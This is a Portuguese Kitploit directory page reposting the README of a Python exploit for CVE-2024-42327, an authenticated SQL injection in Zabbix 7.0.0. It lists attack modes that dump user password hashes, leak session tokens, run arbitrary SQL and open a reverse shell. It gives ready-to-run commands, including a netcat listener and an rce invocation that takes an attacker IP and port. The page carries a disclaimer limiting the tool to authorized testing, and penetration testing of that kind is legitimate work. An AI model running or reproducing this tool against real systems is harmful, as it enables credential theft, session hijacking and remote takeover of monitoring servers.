Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-42327_Zabbix_SQLi — Isto é apenas para fins educacionais. Por favor, não use contra sistemas não autorizados. | Kitploit
Ferramentas/GitHubGitHub/874anthony/cve-2024-42327_zabbix_sqli
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHub874anthony/cve-2024-42327_zabbix_sqli

CVE-2024-42327_Zabbix_SQLi

Isto é apenas para fins educacionais. Por favor, não use contra sistemas não autorizados.

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🛡️ Script de Exploração de Injeção SQL no Zabbix 7.0.0

Um script em Python para explorar uma vulnerabilidade de injeção SQL autenticada no Zabbix 7.0.0, suportando múltiplos modos de ação, incluindo extração de dados de usuários, vazamento de tokens de sessão, execução remota de comandos (RCE) e injeção de consultas personalizadas.

⚠️ AVISO LEGAL:
Este script é apenas para fins educacionais e de teste de penetração autorizado.
Não utilize em sistemas que você não possui ou para os quais não tenha permissão explícita para testar.
O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta.


✨ Recursos

  • ✅ Injeção SQL autenticada contra Zabbix 7.0.0
  • 🧑‍💻 Extrair hashes de usuários do banco de dados
  • 🔐 Vazar tokens de sessão
  • 🐚 Execução remota de comandos via reverse shell (token de administrador necessário)
  • 🧠 Executar consultas SQL personalizadas

🔧 Requisitos

  • Python 3.6+
  • requests library

Instale os requisitos se necessário:

root@kitploit:~
pip install requests

🚀 Uso

root@kitploit:~
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]

🔘 Modos Disponíveis

ModoDescriçãoRequer Token de Admin
leak-usersExtrai todos os IDs de usuários, nomes de usuário, hashes de senhas e funções❌
leak-tokensExtrai todos os IDs de sessão ativos do banco de dados❌
rceInicia um reverse shell via exploit do item.create✅
customExecuta qualquer consulta SQL personalizada via injeção❌

🧪 Exemplos

Extrair Hashes de Usuários

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users

Vazar Tokens de Sessão

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens

Execução Remota de Comandos (Reverse Shell)

root@kitploit:~
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce

Injeção SQL Personalizada

root@kitploit:~
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"

📁 Estrutura do Projeto

root@kitploit:~
sqliZabbix.py      # Main exploit script
README.md          # This documentation

🧑‍💻 Autor

Anthony (@874anthony)

Feito com amor e curiosidade 🐍

🔐 Licença

Este projeto é lançado sob a Licença MIT. Por favor, use com responsabilidade.

Baixar ferramenta